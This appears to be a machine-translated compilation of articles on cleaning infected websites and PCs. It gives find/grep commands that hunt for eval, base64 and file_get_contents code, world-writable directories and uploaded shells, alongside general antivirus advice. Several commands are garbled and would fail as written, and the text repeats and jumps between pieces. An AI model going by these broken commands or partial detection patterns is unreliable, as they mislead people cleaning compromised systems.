Every webmaster has faced the problem of finding vulnerabilities in their website, with the help of which an attacker can upload their malicious code, which in one way or another will affect the performance of the entire site, up to its exclusion from search results.

Most often, infection occurs due to the human factor, but what to do if the site is hacked?

Main problems

The lesser evil is to find and remove the malicious code itself. The main problem is to find the vulnerable spot through which the attacker uploaded his code to your site in order to protect himself from further similar precedents.

To search for malicious code, many anti-virus programs have been written, many services have been created that can point to the address of an infected page, even providing a signature and comprehensive information about the virus itself. But no software can tell you how this “alien code” appeared on the site. Here you should rely only on yourself.

Below I will give several commands that can be used when searching for infected files and/or shells/backdoors uploaded to your website. To do this, we need the Putty program and SSH access to the site.

Search for infected files

Using the following commands, you can find files containing “dangerous” elements that can be used by an attacker to execute malicious obfuscated code.

The output of the files will be written to a log file in your current directory. Each file will contain the path to the found file and a line with a suspicious section of code.

find /Directory with the site -type f -iname "*" -exec grep -Him1 "eval" () \; > ./eval.log
find /Directory with the site -type f -iname "*" -exec grep -Him1 "base64" () \; > ./base64.log
find /Directory with the site -type f -iname "*" -exec grep -Him1 "file_get_contents" () \; > ./file_get_contents.log

Finding directories with full write permissions

The following command displays a list of directories that have full write permissions. These are the directories that are used to infect a website.

find ./Directory with website -perm 777 -type d

Search for changed files over a period

If you know approximately when the infection occurred, you can view a list of changed files over the last few days (the –mtime -7 parameter indicates a change date other than the current one for the past 7 days)

find ./Directory with website -type f -iname "*" -mtime -7

What to do if the site is infected?

So, let's assume that we have found infected files or a shell file. Before you delete it/remove malicious code from it, remember its name (full path), the date the file was modified/created, its gid and user id (for unix systems), this will allow you to find a way to upload it to our site. Let's start with the user and group:

See which user your web server is running as:

ps-aux | grep "apache2" | awk("print $1")

If this user is the same as the user who created the malicious file, then we can assume that it was downloaded through the site itself. If not, the file could have been downloaded via ftp (we strongly recommend changing the passwords for the FTP server and the site’s administrative panel).

cat ./site.ru.access.log | grep “name filenameOfShellScript”

And we get the output of all requests to our script. Using it we determine the userAgent and ip address of our attacker.

With the next command we get a list of all the requests to which he came to us.

cat ./site.ru.access.log | grep “ip” | grep "userAgent"

By carefully analyzing it, you can find a vulnerable spot on the site; you should pay special attention to POST requests from the output, with the help of which a malicious file could be uploaded.

Andrey Izhakovsky, system administrator

First aid

If you find that the site is infected or you receive a notification that there is malware on your account:

Why are there viruses on my website?

Common causes of site infection are:

• vulnerability in the CMS version used;
• vulnerability in the installed CMS extension (themes, plugins, modules);
• viruses on the computer from which the site is managed.

Most often, attackers hack websites automatically using special programs. They collect a large database of sites from search engines according to certain criteria (sites installed on popular CMS and their plugins that are susceptible to any known vulnerability). After this, malicious code is placed in the site files. Therefore, it is important to update the CMS and plugins in a timely manner. From the hosting side, your sites are maximally protected. If another client's site on the server is infected, your site will be safe.

How can I protect the site?

To protect your site from hacking, you should follow simple rules:

• Set the correct rights to directories and site files. Avoid using "777" permissions, as these attributes give anyone full access to your account's files and directories. Use "777" rights only in exceptional cases.
• Monitor updates to the CMS you use and its plugins on official websites and install them in a timely manner.
• Use only official CMS themes and plugins. Very often, hacked (nulled) versions of paid scripts contain viruses.
• Use complex passwords (at least 8 characters long, with numbers and letters of different case). Remember that simple passwords are very easy to guess.
• Use anti-virus software and regularly update anti-virus databases.
• Use only current versions of browsers (Mozilla Firefox, Google Chrome, Opera, Safari).
• Do not store passwords in FTP clients. Very often, viruses take information from an FTP client.

What to do if, when entering the site, the antivirus suddenly started cursing (and if this news was also reported by clients)? Or, for no apparent reason, the site began to load longer than usual, while the main content of the page was already “rendered”? Or maybe the site used interactive scripts that suddenly stopped working?

All of the above is the result of a site being infected with a virus - an alien malicious code. How did this happen, who is to blame, and, most importantly, what to do to eliminate and prevent this from happening in the future?

What's happened?

The malicious code that the antivirus signals is the insertion of a certain encrypted JavaScript code into the site page code, which, when executed, creates a so-called iframe (an HTML element that allows you to include the content of one page in another when displayed). The inserted iframe usually points to an infected page, which already contains more “heavy” code that uses various browser vulnerabilities (mainly Internet Explorer) to download and run executable virus files.

Mechanism of infection

The mechanism for infecting sites in the vast majority of cases is the same: the virus gets onto the computer from which you logged into the site using the FTP protocol, after which it receives the access details for the addresses for which the “remember login/password” option was selected in the FTP client program. Having received the access credentials, the virus sends them to the attackers’ computers, where robot programs that perform the “dirty” work are already located. These robots connect to FTP addresses with the received details, then scan the site directories in search of files with specific names: most often these are root files - those that are first accessed when entering the site. Having detected such a file, the robot downloads it, adds malicious code to the end of the downloaded file, and uploads this file back to the FTP server, replacing the original.

From the server's point of view, this looks like normal user activity: a connection is being made authorized user, downloading and uploading files - in fact, exactly what is performed during a normal website update by a developer via FTP.

Removing the infection

The first thing to do when such an infection is detected is to prevent the virus from re-infecting the site. To do this, just change the FTP access password through the control panel, and also check all computers from which you connected to the site via FTP for viruses, using antiviruses with the latest update databases.

Since the site code is essentially ordinary text files, to remove malicious code you just need to open the infected file, find the required section of code, delete it and save the file. In particularly difficult situations, it may happen that several different viruses have “worked” on the infected site - the site’s files will contain several inserts of various malicious code. Less commonly, there are cases when the content of a site can be damaged quite severely, in which case it is more advisable to restore data from a backup copy than to deal with the treatment of each file manually.

Preventing Infection

In order not to repeat the mistakes of others and protect yourself from damage to the site, just follow simple recommendations:

do not use the password saving capabilities of FTP clients;

periodically change FTP access passwords;

if necessary, limit the addresses of computers from which you are allowed to connect via FTP;

use only “reliable” computers for FTP access - those on which antiviruses with current update databases are installed.

16.02.2015 16:05:23

There is always a chance that your computer will be infected by malware, even if you have an antivirus installed. And when no security software is installed on the computer, this probability is even higher.

If infection occurs, it is best to contact specialists for “treatment.” However, there is not always a computer expert nearby. In this article, you can learn how to recognize the infection yourself and fix the problem - or, if possible, reduce the risk of harm before a specialist arrives.

Signs of infection

If you suspect a virus

Since modern viruses are “tailored” to work on a network, if you suspect an infection, it is extremely important to disconnect the network cable from the computer - or, if the network is wireless, turn off the Wi-Fi module.

Unfortunately, there are situations when the network is needed to carry out “treatment” - for example, to download an antivirus program. Of course, it would be more correct to download the anti-virus utility from another place, and then copy it to an infected but disconnected computer, for example using a flash drive. If this method is not available, you can try using the Internet. However, in no case should you log into online banking systems, connect to mailboxes, and so on, that is, do not expose confidential data in any way. As soon as all the necessary anti-virus tools have been downloaded, the network must be turned off.

It should be understood that the very fact that a computer is infected, that is, the presence of an active virus in the operating memory, can make “treatment” difficult. The virus can resist: for example, block access to the websites of antivirus manufacturers or camouflage itself from specific antivirus programs. This means that in some cases “treatment” with the help of an additional “clean” system may be necessary. For example, you can boot the system from a CD, or you can remove the hard drive with the infected system and connect it as a second one to a known “clean” computer.

How to cure a computer

There are different ways to get rid of malware, each of which has its own advantages and disadvantages. If infection occurs, it is best to contact specialists for “treatment.” However, there is not always a computer expert nearby. In this article, you can learn how to recognize an infection yourself and fix the problem - or, if possible, reduce the risk of harm before a specialist arrives.

Method 1. Using ready-made antivirus tools

The vast majority of users will be satisfied with “cleaning” their computer using ready-made tools that are offered by antivirus software developers. In particular, you can easily find free utilities designed specifically for “curing” an infected computer. Here are some examples of such programs with a Russian-language interface:

• Dr.Web CureIt! (http://www.freedrweb.com/cureit/);
• Kaspersky Virus Removal Tool (http://www.kaspersky.ru/antivirus-removal-tool);
• Microsoft Safety Scanner (http://www.microsoft.com/security/scanner/ru-ru/default.aspx).

Of course, you can use other utilities, but it is recommended to download them only from the official developer sites. And it is advisable to first download it to a “healthy” computer and then transfer it to the infected one.

Despite the comparative simplicity of this method, before embarking on “treatment”, you need to understand a number of principles:

1. Even if your computer is protected by antivirus software, it can be infected with a virus because the antivirus does not recognize it.
2. If the antivirus does not recognize this particular virus at this particular moment, it is quite possible that it will begin to recognize it in the future, for example, if you update the databases with virus signatures.
3. If the installed antivirus does not recognize this particular virus, it is quite possible that an antivirus from another manufacturer will recognize it.
4. If none of the antiviruses finds viruses on your computer, this does not mean that they are not there. However, we have no choice but to assume with a high degree of probability that the computer is “clean”.

In other words, it is possible that you will need to carry out treatment using several utilities from different manufacturers.

The general treatment regimen is as follows:

1. If your computer is infected with a blocker, you must first unblock it (you can read more about this in the article on Trojan blockers
2. Install and run the treatment utility.
3. Follow the instructions.
4. After completing the utility, install and run one or more utilities from other manufacturers in the same way.
5. The computer has been disinfected. Now you need to install (or reinstall) the antivirus complex.
6. The computer is disinfected and protected. You should change all passwords for all Internet services, email programs, instant messengers, etc. It is highly recommended to monitor the movement of funds through plastic cards and bank accounts if you use online banking systems: in case of suspicious transactions, you should contact the bank for approval necessary measures - cancellation of payments, re-issuance of cards, etc.
7. If you were unable to cure your computer on your own for some reason, you need to contact a specialist. Don't forget about the availability of technical support for antivirus users: this can save you a lot of time, nerves and money.

Method 2: Reinstalling the operating system

This is a radical method that should be resorted to if antiviral agents do not help. Before installing the OS again, it is advisable to first format the hard drive, which is not always convenient, since it leads to the destruction of not only malicious programs, but also useful data. In addition, the installation procedure and especially customizing the OS is quite labor-intensive.

The task of reinstalling the system can be made easier if you take care of this in advance. For example, the “My Documents” folder in Windows can be moved to another logical or physical drive, which will allow you to format the system partition at any time without fear of losing personal data. In addition, owners of the latest versions of Windows have the opportunity to create an OS installation disk that also stores its own set of programs and settings.

You should also keep in mind that if your computer is infected with a ransomware virus, simply reinstalling the system will not help you recover encrypted personal data.

Method 3: Manually detect and remove malware

It should be said right away that this method is recommended last. Even a deep knowledge of the operating system is unlikely to help you implement it adequately: there is a high probability that you will either miss some malicious modules, or, on the contrary, mistake a useful program for a virus and delete something you need, violating the integrity of the OS.

Even if we give you some general recommendations, for example, that you should check the program startup folder and Windows registry startup keys, this will not be of much help, because without professional knowledge and experience in IT security issues, it will be very difficult for you to distinguish between “bad” ones. "files from the 'good ones'.

In the age of technology, we often have to deal not only with the ease of use of gadgets, but also with their problems. The same can be said about a computer. The PC system is very complex. Unfortunately, it is susceptible to various types of cyber attacks and How can you tell if your computer is infected with a virus or adware worm?

Harm

What is the essence of the question? If you decide that your computer is infected with a virus, it is important to understand what exactly it is about.

A computer virus is malicious software that can replicate itself, inject itself into important code, system areas, destroy boot sectors, and also spread to other systems over the network.

The main goal of malware is to spread. The fact that a virus can delete, hide, add, etc. is only its side effects.

It also happens that such an “evil” file does not have any motive for programming malicious effects. But due to incompatibility or some subtleties of interaction, the system may fail.

Viruses can “live” on drives and consume all resources from there.

Improved

To understand how to determine that a computer is infected, you need to understand the types of viruses and their interaction on the system.

Unfortunately, with the development of technology, malware has begun to actively improve. Thus, viruses can “cover” entire government systems that are protected by special methods. But even such a defense cannot withstand some “villains.”

Groups

Malicious software differs by distribution methods and functionality. Previously, it was possible to pick them up only through storage media such as floppy disks. Now most of them come to our PC via the Internet.

There is no standardized classification of viruses because they sometimes have ambiguous characteristics. Therefore, it is not easy to assign them to any group.

There are programs that attack certain areas of the system. Viruses can reach files, boot services, source codes, scripts, etc.

There is also a classification based on the mechanism of infection. For example, there are “pests” that are added to an executable file, or those that corrupt a document that cannot be restored. There are also viruses that “live” separately from everyone else, constantly affecting the PC system.

There are virtual "attackers" who can use special technologies inside your system. So it will be difficult for you to even understand how to determine that your computer is infected.

Experts divide viruses by the language in which they were written. There are also software that use additional functions in the system. They can spy, collect necessary information, record user actions, etc.

Warning

You can prevent the occurrence of a notification that your computer is infected. What to do in this case?

Of course, the most popular antivirus programs have long been the main assistants. But recent malware developments have become so advanced that security programs can't handle everything. Therefore, it is important to follow some recommendations so as not to catch a virus and then wonder how to determine that your computer is infected.

Avoid using privileged accounts unless necessary. This refers to a Windows administrator type account. If a virus gets hold of your data, you can say goodbye to all your data and the system as a whole.

Remember that launching suspicious and little-known programs from unverified sources also leads to infection. You should be wary if the system tries to change its files on its own.

It is also worth taking care of potentially dangerous system functionality. Of course, it’s better not to “climb” through unknown resources and take a closer look at the address bar. Use trusted distributions.

If you often work with important data, it is better to transfer it to an external drive or make backup copies. You can capture an image of the entire system with deployment.

The system is in danger

Many people wonder how to determine if your computer is infected. The answer is simple. You will definitely guess that there is something wrong with the system based on the existing signs.

The alarm bells are:

• Unexpected messages or images appear on the screen.
• Regular playback of sounds, which can occur chaotically at any time.
• Self-activation of programs.
• Connecting some utilities to the Internet without your knowledge.
• Sending incomprehensible messages (spam) from your email address to your friends.
• The system freezes or runs slowly.
• A huge number of system errors and notifications.
• Inability to boot the system.
• Disappearance of personal data: files, folders and archives.
• The browser is not working correctly.

Of course, these are not all the signs that can occur during infection. There are a lot of variations: from large pornographic banners to completely shutting down the PC.

First actions

What to do if your computer is infected with a virus? If you can determine that a “worm” has settled in the system, then you need to immediately take a number of actions.

It is important to immediately refuse bank payments and electronic wallets. Do not switch to any important accounts or financial systems.

If you don’t have an antivirus program on your PC, it is advisable to use at least its online version. This way you can quickly scan the system and find out what “surprises” are hidden there.

It is best to turn off the Internet and local network. So that the virus cannot “call” someone to help itself, or “hide” on the World Wide Web for a while. If the antivirus program finds malware, it will automatically decide what to do with it: it can either remove it immediately or move it to quarantine.

By the way, often some security programs cannot cope with such problems, so you will have to install others. But this, in turn, is also not entirely safe. Therefore, try to make sure that an antivirus program is installed on your computer in advance. If it interferes with your work, you can turn it off. But he is the one who knows how to determine that your computer is infected.

If none of the options help, you should take decisive action.

Additional Help

Of course, if you don’t understand computers at all, then it is better to immediately call a specialist who will “treat” your PC. If you have at least a superficial knowledge of the system, you can try to find the virus file yourself. You can come to this option only if you are faced with a regular worm or Trojan.

If you understand that you have a complex malicious program that is not so easy to remove from the system yourself, you can try using third-party programs. In some cases, you will need to connect the hard drive to another PC or boot the system from a disk.

Conclusions

Viruses are a nuisance that has probably happened to every user. Attackers all over the world are trying to steal personal data or simply play a trick on an inexperienced user.

If you have a simple malicious file in front of you, then most likely an antivirus program will be able to find it. She will cure it or remove it on her own.

If you have a Trojan or a worm, you can deal with it yourself by finding it in the system files or root directory. To find it, use any file manager that can sort all system files by date.

If there is a real “villain” in the system, then only real specialists can deal with him. So, they will help not only remove it from your PC, but also save your personal data. If documents are not important to you, or you have nothing on your computer, you can simply reinstall the operating system.